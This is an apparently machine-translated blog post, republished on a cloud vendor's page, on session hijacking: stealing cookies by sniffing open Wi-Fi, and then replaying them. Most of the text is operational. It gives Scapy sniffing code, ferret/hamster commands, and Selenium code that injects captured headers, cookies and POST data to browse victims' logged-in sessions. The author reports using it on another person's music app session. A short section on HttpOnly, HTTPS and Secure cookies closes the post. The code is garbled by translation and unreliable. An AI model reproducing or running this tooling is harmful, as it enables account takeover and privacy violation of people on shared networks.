How to efficiently use the HTTP session you've hijacked?

Source: Internet
Author: User
Tags blank page

HTTP Session Hijacking

HTTP is a stateless protocol, in order to maintain and track the user's state, the introduction of the cookie and session, but all based on the client to send a cookie to identify the user identity, so that the cookie, you can get victim login status, It also achieves the effect of session hijacking.

How to get COOKIEXSS

XSS has a lot of posture that can be taken to the administrator's or user's cookie.

Middleman

Phisher, such as WiFi or ARP spoofing, can see all the user's plaintext information.

Wireless network sniffing

Wi-Fi, whether it is open WiFi, or password known WPA-PSK/WPA2-PSK encryption, can be sniffed, directly see or decrypt after the clear communication, you can also get cookies.

How to use hijacked HTTP sessions for manual use

Hijacked cookies and headers can be modified by Chorme and Firefox's many plugins, such as Chrome's edit this cookie + Modify headers, Firefox's oil monkey script original Cookie Injector.

When adding a cookie using the edit this cookie, be aware of the domain and expiration time of setting the cookie.

This is the Modify headers for HTTP header editing:

Manual operation is very convenient when it is small, but when you encounter a lot of content need to see (such as), you need some automation tools.

Is the result of wireless sniffing in Python's scapy library, which can be viewed in a previous article on wireless sniffing

 a = sniff(iface=‘wlan0mon‘, prn=prn, lfilter=lambda x:x.haslayer(TCP) and x[TCP].flags&8 == 8)

Hamster + Ferret Two tools (hamster + Ferret)

Ferret is a tool that extracts HTTP session information from a packet, and hamster can be used as a proxy server to extract session information from ferret for easy access.

Not much to say, set the HTTP proxy for local 1234, and then access the local 1234 port, the approximate effect is this:

On the right, select Target, which is the source IP address, click on the URL on the left, and the IFRAME on the right will become the URL access content:

Installing Ferret

Hamster is already installed in Kali, so you need to install ferret manually.

It is important to note that the Apt-get installed ferret and this is not the same thing:

--add-architecture i386apt-get updatesudo aptitude install ferret-sidejack:i386

Ferret is only 32-bit, so you need to add support for 32-bit.

Take advantage of session information in a packet
ferret -r test.pcap hamster 

If the Test.pcap contains session information, a hamster.txt appears, then hamster is executed in the current folder, then the HTTP proxy local 1234 is set, and then the 127.0.0.1:1234 can be accessed to see the results above.

Using the session information in the data stream when sniffing

The above method can only take advantage of the packet, hamster can call ferret, on a network card to hijack the sniffing of the session information.

First Cd/usr/bin to ensure that the current directory contains ferret executable file, and then execute hamster, and then set up as above the agent, access to the local 1234 port, click on the upper right corner of the adapters to fill in the need to sniff the network card, such as Wlan0mon, Then submit the query.

Ferret will automatically put the wireless card to channel 6, you can open the terminal iwconfig Wlan0mon Channel 11 to adjust the wireless network card to the target channel, this time constantly refresh the page, you can see the target is constantly changing, And the number of URLs for each target will become much more.

At this point, the hamster terminal shows this:

< color= "#0070c0 ″> inconvenient Place

There are some inconvenient places to use these two tools:

1. We look at the hamster.txt, found that there is no data stored in the Post method, which will lose a lot of information;

2. If there are certain key parts of the headers that need to be transmitted, there is no reservation in the Hamster.txt, and the same loss of information;

3. If NetEase Cloud Music app has access to the background API with a cookie, I would like to use this cookie not only to access the API, but instead to access his main station, using hamster can not be like manually changing the URL;

4. Some headers may need some changes after the first pass, such as Referer, or uset-agent is a mobile phone, I want to use the computer view, you need to change the UA.

So I decided to try to write a more handy tool for myself.

A gadget that Houliangping himself wrote

I need to implement the functionality that Hamster+ferret has already achieved, and then meet the four requirements described above.

At first, I was prepared to write a proxy tool like hamster, but found that there were too many States to save, and that it was more difficult to write than simply forward if the local browser didn't know.

After touching the wall decided to use the Selelnium, this is a Web automation test tool, sometimes also take it to crawl some more difficult things.

Selenium can call a real browser, Chrome, Firefox and so on have provided the corresponding driver, it is more convenient to solve the above mentioned 3rd with a cookie, such as headers change the URL problem

So there are two difficulties in implementing the program.

1. Permanently modify the HTTP header of selenium webdriver, and support to modify it at any time

2. Allow Webdriver to execute the POST method

Installing Selenium

First you need to install Firefox browser, then to GitHub to download the corresponding system driver geckodriver, and then put the geckodriver into the environment variable directory, and then pip install Selenium.

Brief use method

from selenium import webdriverprofile = webdriver.FirefoxProfile()w = webdriver.Firefox(firefox_profile=profile)

Profile is a Firefox browser configuration instance, after the execution will appear a Firefox browser, you can manipulate the variable w, manipulate the browser

such as W.get ("http://baidu.com").

Therefore, the use of selenium also completed the above mentioned inconvenient place of the third article:
can be arbitrary access to the URL I specify, in the address bar to change the return to the good

How to modify Webdriver's headers

Selenium did not provide direct modification of the header support, read this article, tried to find through the chromeoptions can only modify User-agent, after several attempts to find a solution to the problem is a 0-like answer to provide the link, provide the code is this:

fp = Webdriver. Firefoxprofile () Path_modify_header =' C:/xxxxxxx/modify_headers-0.7.1.1-fx.xpi ' fp.add_extension (path_modify_header) fp.set_preference ("Modifyheaders.headers.count",1) fp.set_preference ( "Modifyheaders.headers.action0",  "ADD") fp.set_preference ( "MODIFYHEADERS.HEADERS.NAME0",  "Name_of_header") # Set here the Name of the Headerfp.set_preference ( "Modifyheaders.headers.value0",  "Value_of_header") # Set here the value of the headerfp.set_preference (" Modifyheaders.headers.enabled0 ", true) fp.set_preference (" Modifyheaders.config.active ", true) fp.set_preference (" Modifyheaders.config.alwaysOn ", true) Driver = Webdriver. Firefox (FIREFOX_PROFILE=FP) 

Modify_ HEADERS-0.7.1.1-FX.XPI is a Firefox plug-in, support for the addition of headers to delete and so on, and this modification is persistent, such as modifying the host to baidu.com, although I want to visit the next time is Sina.com,host or baidu.com, although this will be reported Wrong.

Moreover, the most critical thing is that headers can be modified by the configuration of the profile.

This provides the plugin's

The use of this plugin, also reached the above mentioned inconvenience of the place of 2 and 4, can be automatically added to modify all the headers, to be able to manually modify the headers at any time two times.

How to get Webdriver to execute the POST method

Sniffing HTTP requests is definitely not just a get method, it's also critical to post. Search Selenium how to post, found a short answer: No way. But the answer also provides another way, is get a can control the JS content of the page, and then by the execution of JS script, to achieve the purpose of post.

But I am not familiar with JS, so chose a compromise approach: Use requests to get the post response, and then through the Webdriver Execute_script write it into Webdriver.

The HTML for a blank page is this:

So you can extract the post response from the head and body of the content, and then write to Webdriver, write Exectute_script code as follows, 0 can fill head or body,1 fill content.

"document.getElementsByTagName(‘{0}‘)[0].innerHTML = ‘{1}‘" 
Little Architecture of the program

The program is both convenient to sniff, but also to use selenium, and the virtual machine opened a browser and a bit of Kaka (poorly configured), so I decided to write a server side, a client side.

The server side can provide the hijacked data, the client side is responsible for invoking selenium, the session is browsed, so that while doing a certain degree of decoupling, the server and client interface remains the same, and then the server can hijack the session from different channels.

For example, wireless sniffing and the code for a man-in-the-middle attack are definitely different, so there's no need to re-write client parts.

Server Side

This part of the wireless sniffer hijacking session that I used, that is, using a wireless card to receive plaintext HTTP content in open WiFi.

Both of my previous articles talked about scapy sniffing in Python, and the following main explanation for the callback function of the sniff function in Scapy is PRN:

Ip_dict = Defaultdict (dict)DefPrn(PKT):global ip_dcit    if  Not Pkt.haslayer (http. HttpRequest): return none    print pkt.summary ()     URL =  ' http://' +PKT. Host+pkt. path    headers = {I.split ( ":") [0]:i.split ( ":") [1] for I in pkt. Headers.split ( "\ r \ n")}    data = pkt.load if pkt. Method== ' POST ' else  ' None '     Ip_dict[pkt[ip].src][url] = (PKT. Method, headers, data) 

Like hamster, the hijacked information is categorized using the source IP, ip_dict the dictionary used to hold the session information, similar to {' 192.168.1.100′:{' http://baidu.com ':(' GET ', {"Cookie": ' 123′}, ' None ')}}.

interface between client and server

When you request the server's root directory for the IP address of the server, all IP addresses with hijacked sessions are returned;

When a URL such as 192.168.xxx.xxx//10.170.20.20 is requested from the server, all the hijacked URLs of the 10.170.20.20 are returned;

When you request a URL for 92.168.xxx.xxx/10.170.20.20/ahr0cdovl2jhawr1lmnvbq== to the server, Will return the 10.170.20.20 Baidu URL hijacking session information, the third part is Base64 encoded http://baidu.com.

Client Side

First open a browser wd1, used to access the server provided by the session IP, URL, click on a URL of an IP, the session of headers, data and other information into the profile, and then open a browser wd2, you can browse the WD2 in detail other people's login session.

Effect

In the bedroom with wireless campus network of people less, so the test when only I alone.

This is what it looks like when it goes in:

This is a previous sniff to someone else's NetEase Cloud Music app background request with a cookie:

URL changed to the main station, went in, note that the UA through the upper right corner of the plugin removed, or the phone's view:

Change a picture (hehe).

Code

Attached to the GitHub address, only two files, client and server respectively, the py file, no special parameters:

Python proxy_server. PY 6000

Python proxy_client. PY 192. 168. xxx. XXX 6000

Measures to improve the security of cookies HttpOnly properties

Cookies can set the HttpOnly property to some extent to prevent XSS HTTP session hijacking, because the middleman and sniffer get is the plaintext HTTP communication, so this property does not work for these two points, in addition to XSS also has a way to bypass HttpOnly.

Https

HTTPS can encrypt the HTTP headers and data, but the man-in-the-middle attack can be degraded by using sslstrip or the front-end hijacking described in this article to see the plaintext.

Secure property

The secure property of a cookie allows the browser to pass cookies only in HTTPS traffic, and it also largely prevents wireless network sniffing, man-in-the-middle attacks from hijacking HTTP traffic.

How to efficiently leverage the HTTP sessions you've hijacked?

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.